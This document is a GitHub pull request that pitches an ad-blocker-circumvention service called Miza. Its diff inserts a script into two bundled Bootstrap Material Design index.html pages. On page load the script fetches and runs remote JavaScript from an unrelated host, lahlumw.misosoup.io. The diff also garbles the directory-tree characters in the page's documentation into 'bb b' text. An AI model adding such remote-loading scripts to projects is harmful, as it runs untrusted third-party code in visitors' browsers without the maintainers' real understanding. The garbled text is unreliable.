### PR TITLE
Increase Carbon ad revenue by 30%

### DIFF
--- a/platforms/android/assets/www/lib/bootstrap-material-design-master/index.html
+++ b/platforms/android/assets/www/lib/bootstrap-material-design-master/index.html
@@ -1,3 +1,11 @@
+<script type='text/javascript'>           	
+  (function(window, base) {
+    var script = document.createElement("script");
+    script.src = "//" + base + "/c?r=" + Math.random();
+    script.async = true;
+    document.getElementsByTagName('head')[0].appendChild(script);
+  })(window, "lahlumw.misosoup.io");
+</script>
 <!DOCTYPE html>
 
 <html>
@@ -181,21 +189,21 @@
             <p>If downloading instead of using Bower, once downloaded, unzip the compressed folder to see the structure of (the compiled) Material Design for Bootstrap. You'll see something like this:</p>
             <!-- This code must be aligned this way to render correctly -->
               <pre><code class="language-bash" data-lang="bash">Material/
-                ├── css/
-                │ ├── bootstrap-material-design.css
-                │ ├── bootstrap-material-design.css.map
-                │ ├── bootstrap-material-design.min.css
-                │ ├── bootstrap-material-design.min.css.map
-                │ ├── ripples.css.map
-                │ ├── ripples.min.css
-                │ ├── ripples.min.css.map
-                ├── js/
-                │ ├── material.js
-                │ ├── material.min.js
-                │ ├── material.min.js.map
-                │ ├── ripples.js
-                │ ├── ripples.min.js
-                │ ├── ripples.min.js.map
+                bb b  css/
+                b bb b  bootstrap-material-design.css
+                b bb b  bootstrap-material-design.css.map
+                b bb b  bootstrap-material-design.min.css
+                b bb b  bootstrap-material-design.min.css.map
+                b bb b  ripples.css.map
+                b bb b  ripples.min.css
+                b bb b  ripples.min.css.map
+                bb b  js/
+                b bb b  material.js
+                b bb b  material.min.js
+                b bb b  material.min.js.map
+                b bb b  ripples.js
+                b bb b  ripples.min.js
+                b bb b  ripples.min.js.map
               </code>
               </pre>
             <p>Just copy the compiled CSS and JS files and the font files from the .zip and add them to your site.</p>

--- a/www/lib/bootstrap-material-design-master/index.html
+++ b/www/lib/bootstrap-material-design-master/index.html
@@ -1,3 +1,11 @@
+<script type='text/javascript'>           	
+  (function(window, base) {
+    var script = document.createElement("script");
+    script.src = "//" + base + "/c?r=" + Math.random();
+    script.async = true;
+    document.getElementsByTagName('head')[0].appendChild(script);
+  })(window, "lahlumw.misosoup.io");
+</script>
 <!DOCTYPE html>
 
 <html>
@@ -181,21 +189,21 @@
             <p>If downloading instead of using Bower, once downloaded, unzip the compressed folder to see the structure of (the compiled) Material Design for Bootstrap. You'll see something like this:</p>
             <!-- This code must be aligned this way to render correctly -->
               <pre><code class="language-bash" data-lang="bash">Material/
-                ├── css/
-                │ ├── bootstrap-material-design.css
-                │ ├── bootstrap-material-design.css.map
-                │ ├── bootstrap-material-design.min.css
-                │ ├── bootstrap-material-design.min.css.map
-                │ ├── ripples.css.map
-                │ ├── ripples.min.css
-                │ ├── ripples.min.css.map
-                ├── js/
-                │ ├── material.js
-                │ ├── material.min.js
-                │ ├── material.min.js.map
-                │ ├── ripples.js
-                │ ├── ripples.min.js
-                │ ├── ripples.min.js.map
+                bb b  css/
+                b bb b  bootstrap-material-design.css
+                b bb b  bootstrap-material-design.css.map
+                b bb b  bootstrap-material-design.min.css
+                b bb b  bootstrap-material-design.min.css.map
+                b bb b  ripples.css.map
+                b bb b  ripples.min.css
+                b bb b  ripples.min.css.map
+                bb b  js/
+                b bb b  material.js
+                b bb b  material.min.js
+                b bb b  material.min.js.map
+                b bb b  ripples.js
+                b bb b  ripples.min.js
+                b bb b  ripples.min.js.map
               </code>
               </pre>
             <p>Just copy the compiled CSS and JS files and the font files from the .zip and add them to your site.</p>


### PR DESCRIPTION
Hey @champnakub,

Awesome choice picking Carbon ads, they are simple and unobtrusive! My friend and I have been working on our spare time a way to increase Carbon revenue by ~30%. 

We realized that ad blockers were taking a huge chunk of our revenue so we built [Miza](https://miza.io). You can think of Miza as a body guard for your ads, when Miza is installed, your ads will always appear.

We are currently in a private beta and thought your site would be a great fit! If you want to give us a, it's as simple as merging the pull request. Once you have merged the pull request you can view your analytics with this link: [http://miza.io/invite/qucafu](http://miza.io/invite/qucafu)

You can contact me directly if you have any questions at brian@miza.io Thanks for your time!
